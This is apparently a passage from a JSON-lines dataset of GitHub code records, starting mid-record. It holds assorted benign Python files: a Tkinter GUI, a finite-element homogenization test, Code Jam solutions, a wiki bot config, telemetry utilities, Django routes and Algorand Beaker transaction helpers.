StringVar()\r\nlabel_b=Label(window, text='Hour', font=\"Cambria\")\r\nlabel_b.place(x=550, y=199)\r\nperiod=Entry(window, bg='white', fg='black', bd=1, font='Cambria', textvariable=varperiod)\r\nperiod.place(x=655, y=200)\r\n\r\n\r\nvarabsent = StringVar()\r\nlabel_c=Label(window, text='Absentees', font=\"Cambria\")\r\nlabel_c.place(x=100, y=349)\r\nabsent=Entry(window, bg='white', fg='black', bd=1, font='Cambria', textvariable=varabsent)\r\nabsent.place(x=200, y=350)\r\n\r\n\r\nvarleave = StringVar()\r\nlabel_c=Label(window, text='Duty Leave', font=\"Cambria\")\r\nlabel_c.place(x=550, y=349)\r\nleave=Entry(window, bg='white', fg='black', bd=1, font='Cambria', textvariable=varleave)\r\nleave.place(x=655, y=350)\r\n\r\n\r\ncapture=Button(window, text=\"Give Duty Leave\", font=\"Cambria\", bd=0, activebackground=\"#2770f1\", bg=\"#27e9f1\", command=dl)\r\ncapture.place(x=420, y=470)\r\n\r\n\r\n#window creation and initialization\r\n\r\nwindow.config(menu = menubar)\r\nwindow.title('R.O.I')\r\nwindow.geometry(\"984x666\")\r\nwindow.mainloop()","repo_name":"vellathottam/ROI","sub_path":"att.py","file_name":"att.py","file_ext":"py","file_size_in_byte":7030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40322698092","text":"import os,sys\nimport HierAMuS\nimport gmsh\nimport matplotlib.pyplot as plt\n\n\ndef rectAngularRVE(L,b,h,nx,ny,nz,order):\n # current path of file\n currPath = os.path.dirname(os.path.realpath(__file__))\n\n E=100\n nu=0.3\n \n \n lam = E*nu/((1+nu)*(1-2*nu))\n mu = E/(2*(1+nu))\n\n gmsh.initialize()\n gmsh.model.add(\"RVE\")\n\n\n cVert = gmsh.model.occ.addPoint(0,0,0)\n gmsh.model.occ.addBox(-L/2, -b/2, -h/2, L/2, b, h, 1)\n gmsh.model.occ.addBox(0, -b/2, -h/2, L/2,b, h, 2)\n\n \n gmsh.model.occ.synchronize()\n gmsh.model.occ.removeAllDuplicates()\n gmsh.model.occ.synchronize()\n lengthlines = [9,10,11,12,17,18,19,20]\n heightlines = [1,3,5,7,13,15]\n widhtlines = [2,4,6,8,14,16]\n\n for i in lengthlines:\n gmsh.model.mesh.setTransfiniteCurve(i,nx+1)\n for j in heightlines:\n gmsh.model.mesh.setTransfiniteCurve(j,nz+1)\n for k in widhtlines:\n gmsh.model.mesh.setTransfiniteCurve(k,ny+1)\n\n faces = [1,2,3,4,5,6,7,8,9,10,11]\n for i in faces:\n gmsh.model.mesh.setTransfiniteSurface(i) \n\n cFace = 2\n\n gmsh.model.mesh.setTransfiniteVolume(1)\n gmsh.model.mesh.setTransfiniteVolume(2)\n gmsh.option.setNumber(\"Mesh.RecombineAll\", 1)\n gmsh.model.mesh.generate(3)\n \n\n RVE = HierAMuS.FEMPy(currPath,\"RVE\")\n RVE.setStaticHomogenizationSolutionState()\n RVE.setSolver(6)\n RVE.getMacroCommands().setLogLevel(RVE.BasicLog(),RVE.BasicLog())\n \n gm = RVE.getMeshCommands().getFromGMESH()\n gm.addGeomFromGmsh(gmsh)\n #gmsh.fltk.run()\n \n RVE.getMeshCommands().getGeometryCommands().checkGeometry()\n \n gm.addVolumeElements(gmsh,1,1)\n gm.addVolumeElements(gmsh,2,1)\n gm.addVolumeConstraint(gmsh,1,cVert,2)\n gm.addVolumeConstraint(gmsh,2,cVert,2)\n gm.addFaceConstraint(gmsh,cFace,cVert,3)\n #gm.addVolumeConstraint(gmsh,1,cVert,4)\n #gm.addVolumeConstraint(gmsh,2,cVert,4)\n \n mform = RVE.getMeshCommands().getMaterialFormulations()\n mform.addMA1_3D_LinearElastic_Isotrop(1,100,0.3)\n #mform.addMA3_SmallStrainPlasticity(number=1,E=100,nu=0.3,y0=10,yinf=0,xh=10,xd=0,eta=0)\n \n eform = RVE.getMeshCommands().getElementFormulations()\n #eform.addEL300_3DSolid(num=1,meshiddisp=1,disporder=order,mode=1)\n eform.addEL303_ThermoMechanikSolid3D(num=1,meshiddisp=1,meshidtemperatur=2,shapeorder=order,mu=mu,lamb=lam,alpha=0.1,c=0,rho0=0,T0=0,kappa=1,mode=1)\n eform.addEL307_VolumeConstraint(num=2,meshiddisp=1,meshIdLam=3,shapeorder=order,center=1,stiffness=1)\n eform.addEL207_FaceConstraint(num=3,meshIdDisp=1,meshIdRot=4,meshIdLam=5,meshIdMu=6,dispOrder=order,k=1,mode=1)\n eform.addEL307_VolumeConstraint(num=4,meshiddisp=2,meshIdLam=7,shapeorder=order,center=0,stiffness=1,mode=4)\n \n \n mesh = RVE.getMeshCommands()\n mesh.addMaterial(1,1,1)\n mesh.addMaterial(2,1,2)\n mesh.addMaterial(3,1,3)\n mesh.addMaterial(4,1,4)\n \n mesh.setDegreesOfFreedom()\n mesh.getBoundaryConditions().BCVertex(cVert,1,[1,1,1])\n mesh.getBoundaryConditions().BCVertex(cVert,4,[1,1,1])\n \n RVE.getMacroCommands().getHomogenizationCommands().Homogenization3DThermoMechBeam(meshIdDisp=1,dispOrder=order,meshIdTemp=2,tempOrder=order,bctype=1)\n \n RVE.getMacroCommands().sparseSetUp()\n \n \n RVE.getMacroCommands().getHomogenizationCommands().computeAMatrix()\n #gmsh.fltk.run()\n gmsh.finalize()\n \n return RVE\n\n\ndef run():\n #pass\n #return 0\n L=1.0\n RVE = rectAngularRVE(1,1,1,8,8,8,order=1)\n RVE.getMacroCommands().setLogLevel(RVE.FullLog(),RVE.FullLog())\n #RVE.getMacroCommands().printInfo()\n RVE.getMacroCommands().getHomogenizationCommands().setStrains([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.1])\n #RVE.getMacroCommands().newton(refResidual=1e-7)\n RVE.getMacroCommands().assembleSolve()\n RVE.getMacroCommands().assembleSolve()\n RVE.getMacroCommands().getHomogenizationCommands().homogenize()\n print(\"test\")\n C=RVE.getMacroCommands().getHomogenizationCommands().getCMatrix()\n print(C[7,7])\n print(C[11,11])\n RVE.getPlotCommands().toFile()\n RVE.getMacroCommands().computeEigenValues(10,30)\n \n \n \ndef createDiag():\n L=0.01\n x = []\n y = []\n for i in range(16):\n RVE = rectAngularRVE(L,1,1,4,4,4,order=2)\n RVE.getMacroCommands().setLogLevel(RVE.NoLog(),RVE.NoLog())\n #RVE.getMacroCommands().printInfo()\n RVE.getMacroCommands().getHomogenizationCommands().setStrains([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.1])\n #RVE.getMacroCommands().newton(refResidual=1e-7)\n RVE.getMacroCommands().assembleSolve()\n RVE.getMacroCommands().assembleSolve()\n RVE.getMacroCommands().getHomogenizationCommands().homogenize()\n C=RVE.getMacroCommands().getHomogenizationCommands().getCMatrix()\n x.append(L)\n y.append(abs(C[11,11]))\n #RVE.getPlotCommands().toFile()\n #RVE.getMacroCommands().computeEigenValues(10,30)\n L*=2\n \n fig, ax = plt.subplots()\n ax.plot(x,y)\n plt.show()\n \n \nrun()","repo_name":"sklarmann/HierAMuS","sub_path":"Tests/debugtests/homogenization/thermobeam/firstCoupledThermo/RVE.py","file_name":"RVE.py","file_ext":"py","file_size_in_byte":5049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23550424411","text":"inputfile = \"B-large.in\"\r\noutputfile = \"output.out\"\r\n\r\noutput = \"\"\r\n\r\ndef timevalue(t):\r\n hours = int(t[0:2]) * 60\r\n minutes = int(t[3:5])\r\n return hours + minutes\r\n\r\ndef minutesvalue(m):\r\n return m\r\n\r\n\r\nfi = file(inputfile)\r\ndata = fi.read()\r\nfi.close()\r\n\r\nlines = data.split(\"\\n\")\r\n\r\ncindex = 1\r\n\r\ncases = int(lines[0])\r\n\r\n\r\n\r\nfor i in range(1,cases + 1):\r\n Amust = []\r\n Bmust = []\r\n\r\n Aarrives = []\r\n Barrives = []\r\n \r\n \r\n resttime= minutesvalue(int(lines[cindex]))\r\n temp = lines[cindex + 1]\r\n temp2 = temp.split(\" \")\r\n NA = int(temp2[0])\r\n NB = int(temp2[1])\r\n\r\n cindex += (2)\r\n\r\n for k in range(0,NA):\r\n temp = lines[cindex]\r\n temp2 = temp.split(\" \")\r\n Amust.append(timevalue(temp2[0]))\r\n Barrives.append(timevalue(temp2[1]) + resttime)\r\n cindex+= 1\r\n\r\n for k in range(0,NB):\r\n temp = lines[cindex]\r\n temp2 = temp.split(\" \")\r\n Bmust.append(timevalue(temp2[0]))\r\n Aarrives.append(timevalue(temp2[1]) + resttime)\r\n cindex+= 1\r\n\r\n AmustT = Amust[:]\r\n BmustT = Bmust[:]\r\n\r\n # Processing A\r\n AmustT.sort()\r\n Aarrives.sort()\r\n AmustT.reverse()\r\n\r\n for T1 in range(len(Aarrives) - 1,-1,-1):\r\n for T2 in range(len(AmustT) - 1,-1,-1):\r\n if Aarrives[T1] <= AmustT[T2]:\r\n Aarrives.pop(T1)\r\n AmustT.pop(T2)\r\n break\r\n \r\n \r\n # Prcessing B\r\n BmustT.sort()\r\n Barrives.sort()\r\n BmustT.reverse()\r\n\r\n for T1 in range(len(Barrives) - 1,-1,-1):\r\n for T2 in range(len(BmustT) - 1,-1,-1):\r\n if Barrives[T1] <= BmustT[T2]:\r\n Barrives.pop(T1)\r\n BmustT.pop(T2)\r\n break\r\n \r\n\r\n output += \"Case #\"+str(i)+\": \" + str(len(AmustT)) + \" \" + str(len(BmustT)) + \"\\n\"\r\n\r\n\r\nfile2 = file(outputfile,\"w\")\r\nfile2.write(output)\r\nfile2.close()\r\n\r\n \r\n\r\n \r\n \r\n \r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_2/276.py","file_name":"276.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23559774851","text":"def getTidy(s):\r\n s = list(s)\r\n consecutive = -1\r\n consecut = -1\r\n for j in range(0, len(s)-1):\r\n a = int(s[j])\r\n b = int(s[j+1])\r\n if a > b:\r\n if consecutive < 0:\r\n consecutive = j\r\n if s[consecutive] == '1':\r\n s[consecutive] = ''\r\n else:\r\n s[consecutive] = str(int(s[consecutive]) - 1)\r\n for k in range(consecutive + 1, len(s)):\r\n s[k] = '9'\r\n return ''.join(s)\r\n elif a == b and consecut != a:\r\n consecutive = j\r\n consecut = a\r\n return ''.join(s)\r\n\r\nc_num = int(input())\r\ncases = []\r\nfor i in range(0, c_num):\r\n cases.append(input())\r\nfor i in range(0, c_num):\r\n print(\"Case #%d: %s\" % ((i+1), getTidy(cases[i])))\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/3834.py","file_name":"3834.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43082358262","text":"test_mode = False # use test wikipedia instead of normal one if True\nuser_name = u'Lonjers' #should be bot name in production\nbot_user_name = u'User:ProjectRequestedPagesBot'\n# normally posts to something like\n# config.bot_user_name + '/Most Requested ' + project_name + ' Pages'\n# but you can specify specific pages if this is True\nallow_target_pages = True\nmax_catalog_pages = 30 # set to None to do all\narticle_namespace_only = False # do not list links to non article wiki pages\nactually_edit = True # if false only prints dictionary of redlinks does not post\nusers_to_notify_on_error = ['Lonjers', 'Wugapodes']\n","repo_name":"utilitarianexe/most_requested_wiki_articles_bot","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"36089127606","text":"\"\"\"\nDefinition of ListNode\nclass ListNode(object):\n\n def __init__(self, val, next=None):\n self.val = val\n self.next = next\n\"\"\"\nclass Solution:\n \"\"\"\n @param hashTable: A list of The first node of linked list\n @return: A list of The first node of linked list which have twice size\n \"\"\"\n def hashItem(self, item, new_hashTable):\n \tsize = len(new_hashTable)\n \tval = item.val % size\n \tif new_hashTable[val] == None:\n \t\tnew_hashTable[val] = ListNode(item.val)\n \telse:\n \t\ttmp = new_hashTable[val]\n \t\twhile tmp.next:\n \t\t\ttmp = tmp.next\n \t\ttmp.next = ListNode(item.val)\n\n def rehashing(self, hashTable):\n # write your code here\n size = len(hashTable) * 2\n new_hashTable = [None for i in range(size)]\n for item in hashTable:\n \tif item:\n \t\ttmp = item\n \t\twhile tmp:\n \t\t\tself.hashItem(tmp, new_hashTable)\n \t\t\ttmp = tmp.next\n return new_hashTable\n\n\n\n\n\n\n","repo_name":"chengchengXCC/interview_questions","sub_path":"LintCode/1st_round_fail/129.py","file_name":"129.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5855389090","text":"import glob\nimport imp\nimport inspect\nimport logging\nimport os\nimport socket\nimport sys\nimport time\n\nfrom telemetry.core import exceptions\n\n\ndef GetBaseDir():\n main_module = sys.modules['__main__']\n if hasattr(main_module, '__file__'):\n return os.path.dirname(os.path.abspath(main_module.__file__))\n else:\n return os.getcwd()\n\n\ndef GetTelemetryDir():\n return os.path.normpath(os.path.join(\n __file__, os.pardir, os.pardir, os.pardir))\n\n\ndef GetTelemetryThirdPartyDir():\n return os.path.normpath(os.path.join(\n __file__, os.pardir, os.pardir, os.pardir, 'third_party'))\n\n\ndef GetUnittestDataDir():\n return os.path.join(GetTelemetryDir(),\n 'telemetry', 'internal', 'testing')\n\n\ndef GetChromiumSrcDir():\n return os.path.normpath(os.path.join(GetTelemetryDir(), os.pardir, os.pardir))\n\n\ndef AddDirToPythonPath(*path_parts):\n path = os.path.abspath(os.path.join(*path_parts))\n if os.path.isdir(path) and path not in sys.path:\n sys.path.insert(0, path)\n\n_counter = [0]\ndef _GetUniqueModuleName():\n _counter[0] += 1\n return \"page_set_module_\" + str(_counter[0])\n\ndef GetPythonPageSetModule(file_path):\n return imp.load_source(_GetUniqueModuleName(), file_path)\n\n\ndef WaitFor(condition, timeout):\n \"\"\"Waits for up to |timeout| secs for the function |condition| to return True.\n\n Polling frequency is (elapsed_time / 10), with a min of .1s and max of 5s.\n\n Returns:\n Result of |condition| function (if present).\n \"\"\"\n min_poll_interval = 0.1\n max_poll_interval = 5\n output_interval = 300\n\n def GetConditionString():\n if condition.__name__ == '':\n try:\n return inspect.getsource(condition).strip()\n except IOError:\n pass\n return condition.__name__\n\n start_time = time.time()\n last_output_time = start_time\n while True:\n res = condition()\n if res:\n return res\n now = time.time()\n elapsed_time = now - start_time\n last_output_elapsed_time = now - last_output_time\n if elapsed_time > timeout:\n raise exceptions.TimeoutException('Timed out while waiting %ds for %s.' %\n (timeout, GetConditionString()))\n if last_output_elapsed_time > output_interval:\n logging.info('Continuing to wait %ds for %s. Elapsed: %ds.',\n timeout, GetConditionString(), elapsed_time)\n last_output_time = time.time()\n poll_interval = min(max(elapsed_time / 10., min_poll_interval),\n max_poll_interval)\n time.sleep(poll_interval)\n\n\ndef GetUnreservedAvailableLocalPort():\n \"\"\"Returns an available port on the system.\n\n WARNING: This method does not reserve the port it returns, so it may be used\n by something else before you get to use it. This can lead to flake.\n \"\"\"\n tmp = socket.socket()\n tmp.bind(('', 0))\n port = tmp.getsockname()[1]\n tmp.close()\n\n return port\n\n\ndef GetBuildDirectories():\n \"\"\"Yields all combination of Chromium build output directories.\"\"\"\n build_dirs = ['build',\n os.path.basename(os.environ.get('CHROMIUM_OUT_DIR', 'out')),\n 'xcodebuild']\n\n build_types = ['Debug', 'Debug_x64', 'Release', 'Release_x64']\n\n for build_dir in build_dirs:\n for build_type in build_types:\n yield build_dir, build_type\n\n\ndef GetSequentialFileName(base_name):\n \"\"\"Returns the next sequential file name based on |base_name| and the\n existing files. base_name should not contain extension.\n e.g: if base_name is /tmp/test, and /tmp/test_000.json,\n /tmp/test_001.mp3 exist, this returns /tmp/test_002. In case no\n other sequential file name exist, this will return /tmp/test_000\n \"\"\"\n name, ext = os.path.splitext(base_name)\n assert ext == '', 'base_name cannot contain file extension.'\n index = 0\n while True:\n output_name = '%s_%03d' % (name, index)\n if not glob.glob(output_name + '.*'):\n break\n index = index + 1\n return output_name\n\ndef IsRunningOnCrosDevice():\n \"\"\"Returns True if we're on a ChromeOS device.\"\"\"\n lsb_release = '/etc/lsb-release'\n if sys.platform.startswith('linux') and os.path.exists(lsb_release):\n with open(lsb_release, 'r') as f:\n res = f.read()\n if res.count('CHROMEOS_RELEASE_NAME'):\n return True\n return False\n","repo_name":"googlearchive/big-rig","sub_path":"app/src/thirdparty/telemetry/core/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4229,"program_lang":"python","lang":"en","doc_type":"code","stars":857,"dataset":"github-code","pt":"61"} +{"seq_id":"2025065811","text":"import sys\nfrom collections import deque\n\nqueue = deque()\n\nn = int(input())\n\n# n만큼 큐에 저장\nfor i in range(n):\n queue.append(i + 1)\n\n# 한장이 남을때까지:\nwhile len(queue) > 1:\n queue.popleft()\n if len(queue) < 1:\n break\n queue.append(queue.popleft())\n\n# 마지막 남게 되는 카드 출력\nif queue:\n print(queue[0])\n\n ","repo_name":"yechan9601/Algorithm-ProblemSolving","sub_path":"algorithm/silver/2164.py","file_name":"2164.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33864495044","text":"from organization.views import OrgDetailTeachersView,OrgDetailHomePageView,TeachersListView,OrgDetailDescView,OrgListView,OrgDetailCourseView\nfrom django.urls import path,include,re_path\n\nurlpatterns = [\n path('org-detail-course/',OrgDetailCourseView.as_view(),name='org_detail_course'),\n path('org-detail-desc/',OrgDetailDescView.as_view(),name='org_detail_desc'),\n path('org-detail-homepage/',OrgDetailHomePageView.as_view(),name='org_detail_homepage'),\n path('org-detail-teachers/',OrgDetailTeachersView.as_view(),name='org_detail_teachers'),\n path('teachers-list/',TeachersListView.as_view(),name='teachers-list'),\n path('orglist/',OrgListView.as_view(),name='orglist'),\n]\n","repo_name":"TheFifthMan/imooc","sub_path":"apps/organization/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40465373066","text":"#silindirin yüzey alanı ve hacmini bulan uygulama\r\nwhile True:\r\n x=int(input(\"silindirin yüzey alanı için 1,hacmi için 2,çıkış için 3'e basınız.\"))\r\n pi=3.14\r\n if(x==1 or x==2):\r\n r=float(input(\"silindirinizin yarıçapını giriniz:\"))\r\n h=float(input(\"silindirinizin yüksekliğini giriniz:\"))\r\n if x==1:\r\n ya=((2*pi*r)*h)+(2*pi*r*r)\r\n print(\"silindirinizin yüzey alanı:\",ya)\r\n elif x==2:\r\n v=(pi*r*r)*h\r\n print(\"silindirinizin hacmi:\",v)\r\n elif x==3:\r\n print(\"çıkış yapılıyor.\")\r\n break\r\n else:\r\n print(\"geçerli bir değer giriniz.\")\r\n\r\n\r\n","repo_name":"silacakmak/calisma","sub_path":"silindir.py","file_name":"silindir.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21096334726","text":"from base64 import b64decode\nimport copy\nfrom math import ceil\nfrom typing import Any, cast\n\nfrom algosdk.account import address_from_private_key\nfrom algosdk.atomic_transaction_composer import (\n TransactionSigner,\n AccountTransactionSigner,\n MultisigTransactionSigner,\n LogicSigTransactionSigner,\n AtomicTransactionComposer,\n ABI_RETURN_HASH,\n TransactionWithSigner,\n abi,\n)\nfrom algosdk.future import transaction\nfrom algosdk.logic import get_application_address\nfrom algosdk.source_map import SourceMap\nfrom algosdk.v2client.algod import AlgodClient\nfrom algosdk.constants import APP_PAGE_MAX_SIZE\n\nfrom beaker.application import Application, get_method_spec\nfrom beaker.decorators import (\n HandlerFunc,\n MethodHints,\n DefaultArgument,\n DefaultArgumentClass,\n)\nfrom beaker.client.state_decode import decode_state\nfrom beaker.client.logic_error import LogicException\nfrom beaker.client.application_client import ApplicationClient\nimport algosdk\nfrom config import player\nfrom algorand import sp\n\ndef get_transaction(atc: AtomicTransactionComposer, i: int):\n tws: TransactionWithSigner = atc.build_group()[i]\n txn = tws.txn.dictify()\n if \"grp\" in txn: del txn[\"grp\"]\n tws.txn = transaction.Transaction.undictify(txn)\n return tws\n\ndef remove_group(tws: TransactionWithSigner):\n txn = tws.txn.dictify()\n if \"grp\" in txn: del txn[\"grp\"]\n tws.txn = transaction.Transaction.undictify(txn)\n return tws\n\ndef finalize(appclient: ApplicationClient, atc: AtomicTransactionComposer):\n try:\n opt_in_result = atc.execute(appclient.client, 4)\n except Exception as e:\n if \"logic\" in str(e):\n raise appclient.wrap_approval_exception(e)\n else:\n raise e\n\n return opt_in_result.tx_ids[0]\n\ndef create_atc_from_kwargs(kwargs):\n atc = AtomicTransactionComposer()\n for k,arg in kwargs.items():\n if type(arg) == AtomicTransactionComposer:\n txns = arg.build_group()\n for i in range(0, len(txns)-1):\n atc.add_transaction(remove_group(txns[i]))\n kwargs[k] = remove_group(txns[-1])\n return atc \n\ndef create_nosend(\n appclient: ApplicationClient,\n sender: str = None,\n signer: TransactionSigner = None,\n args: list[Any] = None,\n suggested_params: transaction.SuggestedParams = None,\n on_complete: transaction.OnComplete = transaction.OnComplete.NoOpOC,\n extra_pages: int = None,\n **kwargs,\n) -> AtomicTransactionComposer:\n \"\"\"Submits a signed ApplicationCallTransaction with application id == 0 and the schema and source from the Application passed\"\"\"\n\n appclient.build()\n assert appclient.clear_binary is not None and appclient.approval_binary is not None\n\n if extra_pages is None:\n extra_pages = ceil(\n (\n (len(appclient.approval_binary) + len(appclient.clear_binary))\n - APP_PAGE_MAX_SIZE\n )\n / APP_PAGE_MAX_SIZE\n )\n\n sp = appclient.get_suggested_params(suggested_params)\n signer = appclient.get_signer(signer)\n sender = appclient.get_sender(sender, signer)\n\n atc = create_atc_from_kwargs(kwargs)\n if appclient.app.on_create is not None:\n appclient.add_method_call(\n atc,\n appclient.app.on_create,\n sender=sender,\n suggested_params=sp,\n on_complete=on_complete,\n approval_program=appclient.approval_binary,\n clear_program=appclient.clear_binary,\n global_schema=appclient.app.app_state.schema(),\n local_schema=appclient.app.acct_state.schema(),\n extra_pages=extra_pages,\n app_args=args,\n **kwargs,\n )\n else:\n atc.add_transaction(\n TransactionWithSigner(\n txn=transaction.ApplicationCreateTxn(\n sender=sender,\n sp=sp,\n on_complete=on_complete,\n approval_program=appclient.approval_binary,\n clear_program=appclient.clear_binary,\n global_schema=appclient.app.app_state.schema(),\n local_schema=appclient.app.acct_state.schema(),\n extra_pages=extra_pages,\n app_args=args,\n **kwargs,\n ),\n signer=signer,\n )\n )\n\n return atc\n\ndef update_nosend(\n appclient: ApplicationClient,\n sender: str = None,\n signer: TransactionSigner = None,\n args: list[Any] = None,\n suggested_params: transaction.SuggestedParams = None,\n **kwargs,\n) -> AtomicTransactionComposer:\n\n \"\"\"Submits a signed ApplicationCallTransaction with OnComplete set to UpdateApplication and source from the Application passed\"\"\"\n appclient.build()\n\n sp = appclient.get_suggested_params(suggested_params)\n signer = appclient.get_signer(signer)\n sender = appclient.get_sender(sender, signer)\n\n atc = create_atc_from_kwargs(kwargs)\n if appclient.app.on_update is not None:\n appclient.add_method_call(\n atc,\n appclient.app.on_update,\n on_complete=transaction.OnComplete.UpdateApplicationOC,\n sender=sender,\n suggested_params=sp,\n index=appclient.app_id,\n approval_program=appclient.approval_binary,\n clear_program=appclient.clear_binary,\n app_args=args,\n **kwargs,\n )\n else:\n atc.add_transaction(\n TransactionWithSigner(\n txn=transaction.ApplicationUpdateTxn(\n sender=sender,\n sp=sp,\n index=appclient.app_id,\n approval_program=appclient.approval_binary,\n clear_program=appclient.clear_binary,\n app_args=args,\n **kwargs,\n ),\n signer=signer,\n )\n )\n\n return atc\n\ndef opt_in_nosend(\n appclient: ApplicationClient,\n sender: str = None,\n signer: TransactionSigner = None,\n args: list[Any] = None,\n suggested_params: transaction.SuggestedParams = None,\n **kwargs,\n) -> AtomicTransactionComposer:\n \"\"\"Submits a signed ApplicationCallTransaction with OnComplete set to OptIn\"\"\"\n\n sp = appclient.get_suggested_params(suggested_params)\n signer = appclient.get_signer(signer)\n sender = appclient.get_sender(sender, signer)\n\n atc = create_atc_from_kwargs(kwargs)\n if appclient.app.on_opt_in is not None:\n appclient.add_method_call(\n atc,\n appclient.app.on_opt_in,\n on_complete=transaction.OnComplete.OptInOC,\n sender=sender,\n suggested_params=sp,\n index=appclient.app_id,\n app_args=args,\n signer=signer,\n **kwargs,\n )\n else:\n atc.add_transaction(\n TransactionWithSigner(\n txn=transaction.ApplicationOptInTxn(\n sender=sender,\n sp=sp,\n index=appclient.app_id,\n app_args=args,\n **kwargs,\n ),\n signer=signer,\n )\n )\n\n return atc\n\ndef close_out_nosend(\n appclient: ApplicationClient,\n sender: str = None,\n signer: TransactionSigner = None,\n args: list[Any] = None,\n suggested_params: transaction.SuggestedParams = None,\n **kwargs,\n) -> AtomicTransactionComposer:\n \"\"\"Submits a signed ApplicationCallTransaction with OnComplete set to CloseOut\"\"\"\n\n sp = appclient.get_suggested_params(suggested_params)\n signer = appclient.get_signer(signer)\n sender = appclient.get_sender(sender, signer)\n\n atc = create_atc_from_kwargs(kwargs)\n if appclient.app.on_close_out is not None:\n appclient.add_method_call(\n atc,\n appclient.app.on_close_out,\n on_complete=transaction.OnComplete.CloseOutOC,\n sender=sender,\n suggested_params=sp,\n index=appclient.app_id,\n app_args=args,\n signer=signer,\n **kwargs,\n )\n else:\n atc.add_transaction(\n TransactionWithSigner(\n txn=transaction.ApplicationCloseOutTxn(\n sender=sender,\n sp=sp,\n index=appclient.app_id,\n app_args=args,\n **kwargs,\n ),\n signer=signer,\n )\n )\n\n return atc\n\ndef clear_state_nosend(\n appclient: ApplicationClient,\n sender: str = None,\n signer: TransactionSigner = None,\n args: list[Any] = None,\n suggested_params: transaction.SuggestedParams = None,\n **kwargs,\n) -> AtomicTransactionComposer:\n\n \"\"\"Submits a signed ApplicationCallTransaction with OnComplete set to ClearState\"\"\"\n\n sp = appclient.get_suggested_params(suggested_params)\n signer = appclient.get_signer(signer)\n sender = appclient.get_sender(sender, signer)\n\n atc = create_atc_from_kwargs(kwargs)\n if appclient.app.on_clear_state is not None:\n appclient.add_method_call(\n atc,\n appclient.app.on_clear_state,\n on_complete=transaction.OnComplete.ClearStateOC,\n sender=sender,\n suggested_params=sp,\n index=appclient.app_id,\n app_args=args,\n signer=signer,\n **kwargs,\n )\n else:\n atc.add_transaction(\n TransactionWithSigner(\n txn=transaction.ApplicationClearStateTxn(\n sender=sender,\n sp=sp,\n index=appclient.app_id,\n app_args=args,\n **kwargs,\n ),\n signer=signer,\n )\n )\n\n return atc\n\ndef delete_nosend(\n appclient: ApplicationClient,\n sender: str = None,\n signer: TransactionSigner = None,\n args: list[Any] = None,\n suggested_params: transaction.SuggestedParams = None,\n **kwargs,\n) -> AtomicTransactionComposer:\n \"\"\"Submits a signed ApplicationCallTransaction with OnComplete set to DeleteApplication\"\"\"\n\n sp = appclient.get_suggested_params(suggested_params)\n signer = appclient.get_signer(signer)\n sender = appclient.get_sender(sender, signer)\n\n atc = create_atc_from_kwargs(kwargs)\n if appclient.app.on_delete:\n appclient.add_method_call(\n atc,\n appclient.app.on_delete,\n on_complete=transaction.OnComplete.DeleteApplicationOC,\n sender=sender,\n sp=sp,\n index=appclient.app_id,\n app_args=args,\n signer=signer,\n **kwargs,\n )\n else:\n atc.add_transaction(\n TransactionWithSigner(\n txn=transaction.ApplicationDeleteTxn(\n sender=sender,\n sp=sp,\n index=appclient.app_id,\n app_args=args,\n **kwargs,\n ),\n signer=signer,\n )\n )\n\n return atc\n\ndef call_nosend(\n appclient: ApplicationClient,\n method: abi.Method | HandlerFunc,\n sender: str = None,\n signer: TransactionSigner = None,\n suggested_params: transaction.SuggestedParams = None,\n on_complete: transaction.OnComplete = transaction.OnComplete.NoOpOC,\n local_schema: transaction.StateSchema = None,\n global_schema: transaction.StateSchema = None,\n approval_program: bytes = None,\n clear_program: bytes = None,\n extra_pages: int = None,\n accounts: list[str] = None,\n foreign_apps: list[int] = None,\n foreign_assets: list[int] = None,\n note: bytes = None,\n lease: bytes = None,\n rekey_to: str = None,\n **kwargs,\n) -> AtomicTransactionComposer:\n\n \"\"\"Handles calling the application\"\"\"\n\n if not isinstance(method, abi.Method):\n method = get_method_spec(method)\n\n hints = appclient.method_hints(method.name)\n\n atc = create_atc_from_kwargs(kwargs)\n \n atc = appclient.add_method_call(\n atc,\n method,\n sender,\n signer,\n suggested_params=suggested_params,\n on_complete=on_complete,\n local_schema=local_schema,\n global_schema=global_schema,\n approval_program=approval_program,\n clear_program=clear_program,\n extra_pages=extra_pages,\n accounts=accounts,\n foreign_apps=foreign_apps,\n foreign_assets=foreign_assets,\n note=note,\n lease=lease,\n rekey_to=rekey_to,\n **kwargs,\n )\n # If its a read-only method, use dryrun (TODO: swap with simulate later?)\n if hints.read_only:\n dr_req = transaction.create_dryrun(appclient.client, atc.gather_signatures())\n dr_result = appclient.client.dryrun(dr_req)\n method_results = appclient._parse_result(\n {0: method}, dr_result[\"txns\"], atc.tx_ids\n )\n return method_results.pop()\n\n return atc\n","repo_name":"Geladen/algorand-games-platform","sub_path":"src/algogames/beaker2.py","file_name":"beaker2.py","file_ext":"py","file_size_in_byte":13066,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} 